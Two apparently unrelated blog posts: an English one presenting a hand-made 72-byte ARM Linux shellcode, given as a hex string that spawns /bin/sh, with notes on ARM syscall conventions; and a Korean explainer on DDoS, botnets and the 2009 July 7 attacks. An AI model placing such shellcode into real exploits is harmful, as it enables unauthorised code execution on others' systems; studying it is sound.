It is hard to find a very simple ARM shellcode. So I decided to make my own ARM shellcode.

ARM is becoming more and more popular architecture as the number of smart phones and 'net books' are expanding. Don't forget! iPhone and Nokia tablets are also running on ARM. :D

So what is the most important thing to consider to generate ARM shellcode?

First, the linux system call in ARM is little bit different from the x86 system call. Namely, the system call number is stored in r7 register instead of r0 register. (eax register can be considered as r0 in ARM). Thus, the arguments are stored in r0, r1, ... in turn.

Second, we need some trick to load 32bit immediate value into a memory address in ARM. Here, I am using four sequential arm instructions to push 32bit immediate into stack. Note that the exclamation mark in ARM assembly code means that the index operation is performed before applying the real instruction. For example, str r2, [r3, #-4]!  means: store r2 value to the ptr {r3-4} and r3 = r3 -4.

With the above facts in mind, I will present my own ARM shellcode here !!
This is just a simple example, and it contains null characters. So not applicable in most of the real cases. :)

 (ARM shellcode, execute /bin/sh and call exit) (72 byte)  
 // by funkyG  
 "\x00\x00\x20\xe0\x01\x10\x21\xe0\x02\x20\x22\xe0\x04\x20\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x2f\x73\x68\x04\xc0\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x62\x69\x6e\x04\xc0\x2d\xe5\x0d\x00\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef"  

어딜가나, 그저 DDoS! 도대체 그게 뭔데??

DDoS는 Distributed Denial of Service 의 약자로써 한글로 번역하면 '분산 서비스 거부 공격' 입니다.

하지만, DDoS는 DoS라는 공격기법의 발전형태입니다.
그럼 DoS가 뭔지 일단 알아야겠죠?

이름에서 알 수 있듯이, DoS는 인터넷상의 특정 자원을 평소처럼 이용할 수 없는 상태를 가르킵니다. 이러한 서비스 단절은 여러가지 이유가 있을 수 있는데 보통 네트워크장애로 인한 제대로 된 서비스를 못하게 됩니다. 공격 형태는 꽤 다양한데, Buffer OverFlow (BOF) 공격, SYN Flood 공격, Eavesdrop 공격, Virus/Worm 공격 등이 있습니다.

일전의 DoS공격시절에는, 보통 한 두대의 컴퓨터로 타겟서버의 이러한 알려진 공략법으로 과다하게 트래픽을 유발하거나, 시스템마비를 일으켜서 서비스 단절상태로 만들었지만.. 곧 왠만한 방어기법 (IP blocking 등)으로 처리가 가능해지면서, DoS는 효과적인 공격방법으로써 제 구실을 할 수 없게되엇죠.

그리하여, 이 공격기법을 발전시켜 나온 것이 Distributed DoS 방법입니다.
즉, 나 혼자 공격하는게 아니고 여러곳에서 분산해서 동시다발적으로 집중 공격 하자는 아이디어였죠.

흠..이제 뭔지는 알겠는데, 어떤식으로 공격이 이뤄지는건지 궁금하다구!

추상적인 단계에서 바라보면, DDoS 자체는 그렇게 복잡한 공격기법이 아닙니다.
어떻게 보면 단순무식한 방법이죠. (그리고..대부분의 경우에서.. 단순무식방법이 가장 무섭죠..)

대충 Diagram을 그려보자면 다음과 같습니다:

이와 같은 DDos의 구조를 이해하기 위해서는 몇가지 용어를 알아야합니다.

• Bot (Zombie) : 주로 좀비PC라고 불리는 이 집단은 보통 가정집 컴퓨터 같은 보안에 취약하고 노출되어있는 개인 PC들로 이루어져있습니다. 취약점을 이용한 침투로 바이러스/웜등을 설치하고 Botmaster의 명령을 대기합니다. 대부분의 경우에는, 사용자들은 자신들이 감염되었는지조차 알 지 못하는 경우가 많습니다. 실질적 공격이 이루어지면, 각각의 좀비PC들이 공격 도구가 되는 셈이지요.
• Bot Master : 이름 그대로, 위와같은 방법으로 감염시킨 bot들의 주인이 되는 컴퓨터입니다. Bot들의 분산과 실질적인 공격명령을 담당하는 컴퓨터입니다. Master 컴퓨터도 보통 취약점을 이용하여 특정 서버등을 공략/침투하여 만들어집니다. Bot들은 Master로부터 명령이 떨어지면, 주어진 공격 대상을 공격하기 시작하죠.
• Bot Network : 줄여서 Botnet이라고 불리는 이 네트워크는 말그대로 bot들과 botmaster가 이루고 있는 네트워크를 칭합니다.
• Attacker : 흔히들 말하는 '해커', '배후세력' 입니다. 이러한 시스템을 구축한 장본인들이지요. Master의 권한으로 널리 퍼져있는 bot들에게 공격명령을 직접적으로 내리는 역할을 합니다. 예전에는 개인적인 명성, 자금조달(?)을 목표로 소규모 또는 개인이 대다수였지만.. 최근들어 조직화되고 치밀해지고 있습니다.
• Target : 말그대로..타겟. 피해자. 희생양입니다.
  

용어 설명을 하면서 대충 작동원리도 설명이 된 것 같지만, 좀 더 자세히 설명하자면..

공격자는 bot 프로그램을 만들어서 감염시키므로서 최대한 많은 컴퓨터들을 자신의 botnet 안에 추가하려고 노력합니다. 어느정도 병력(?)이 모인 후에는, master를 이용하여 공격지시를 내리고, 전 세계적으로 감연된 좀비PC들은 자신들이 뭘 하고 있는지도 모른채 target을 일제히 공격하기 시작하는겁니다.

흔히 이런 메카니즘을 C&C (Command & Control) 이라고 부르는데, 초창기에는 IRC 프로토콜을 사용한 C&C모델들로 주축을 이루었다가 IRC의 한계로 인해서 HTTP나 P2P 프로토콜을 이용하는 botnet 모델이 나오기도 했습니다. [한때 시끄러웠던 Conficker worm은 HTTP를 이용한 봇넷이었고, Storm worm은 P2P (특히 overnet)을 이용한 봇넷이었습니다.]

IRC 프로토콜이야 필터해서 막아버리면 그만이었지만..
(IRC 프로토콜을 회사/기업에서 쓸 일도 별로 없을 뿐더러)
HTTP같은 경우는 차단할 수도 없는 노릇이고.. 이같은 사실을 악용한 Conficker같은 botnet 덕분에 많은 사람들이 고생을 했었죠 :(

근데, 이번 7.7 대란에서 사용된 DDoS는 이전 공격과는 다르다던데..? 뭐가?

이번 worm에 대해서 자세한 기술적인 부분은 들여다보지 않아서 모든 차이점을 말씀해드릴 수는 없지만, 이번 7.7 대란에 사용된 방법이 이전 DDoS 공격과는 확실히 다른점은 있었습니다.

일단 알려진 바로는, MyDoom 변종이 사용되어졌다고 합니다.
MyDoom은 사실 대량 메일전송으로 악명 높았던 웜이었습니다 :)

위에서 설명한 공격방법을 열심히 읽으셨다는 가정하에, 차이점을 설명하겠습니다 ^^

이번 공격에는 C&C 메카니즘이 사용되지 않았다고 합니다.
그럼 어떻게 좀비PC들이 공격을 시작했을까요? 또, 어디를 공격할지 어떻게 알았을까요?

공격에 사용된 worm을 안랩에서 분석해본 결과, uregvs.nls 라는 공격 대상 목록을 담은 파일을 '자체생성' 한 후, 스스로 공격 시간을 바꿔가면서 공격한다는 것이라는게 밝혀졌습니다.

즉, 공격자가 직접 명령을 내릴 필요 없이, 알아서 공격대상을 (정해진 룰이 있는지는 모르겠지만) 정하고, 시간도 정해서, 다른 감염된 좀비PC와 함께 새로운 리스트의 대상들을 같은시각에 일제히 공격하는 것이죠.
이러한 특성 때문에, 1차 공격 이후에 2차, 3차 와 같은 연속 공격이 일어난것입니다.

이런 공격방법은, 이전의 DDoS공격에선 보여지지 않던 방법인지라 초반에 많이 당황한듯 싶습니다.
C&C메카니즘이 아니기에, 공격자가 완벽한 명령권한을 가지고 있지는 않지만, 그 덕분에 오래 살아 남는 원인이 되기도 합니다. 대게 C&C메카니즘을 사용하는 공격방법은 BotMaster 컴퓨터의 정보를 알아내고 차단함으로서 좀비PC로 하여금 더이상의 추가 명령을 받지 않게 하여 공격을 저지하는데, 이번엔 BotMaster에게 명령을 받는것이 아닌, 자제적으로 공격하는것이기 때문에.. 마땅히 한번에 봇넷을 무력화시킬 방법이 없는것이지요.

확실하게 막는 방법은, 개개인의 좀비PC를 치료하는 방법인데.. 시간도 많이 걸리고 아무래도 쉽게 하기는 힘들겠죠..

이게 다인가?

이게 전부였으면 그나마 나았겠지만..
공격자가 정말 악질인가 봅니다.

10일 자정부터, 하드디스크의 파일들도 손상하는 루틴이 들어있다고 합니다.

'다른 기업이 피해보는거지, 내 컴퓨터가 고장나는건 아니니까~' 라는 생각으로 별다른 관심 없으셨던분들도 자신의 컴퓨터를 지키기 위해서는 신경쓰셔야된다는 뜻입니다.

파일손상에 대한 정보와 긴급 사전조치방법은 http://viruslab.tistory.com/896 에 설명되어있습니다.

이번 사건에 대한 개인적 견해

안철수 교수님께서 어제 인터뷰에서 하신 말씀처럼 "우리가 자초한 측면이 있다" 라는 말에 전적으로 동의 하는 바입니다.

그동안 우리는 'IT강국'이라는 녹슬어버린지 오래된 타이틀 아래에서 너무 안일하게 살아왔습니다.

더이상 우리나라는 IT강국이 아닙니다. 다시 그 때로 돌아가기 위해 피나는 노력과 지원이 필요합니다.

안타까운 사건이지만, 이번 일을 계기로 정부가 조금더 IT쪽에 신경쓰고 적극적 지원을 해주어서 다음번엔 이런 불미스러운 시도가 있더라도, 공격자를 향해 비웃음을 날려줄 수 있는 때가 오기를 바래봅니다.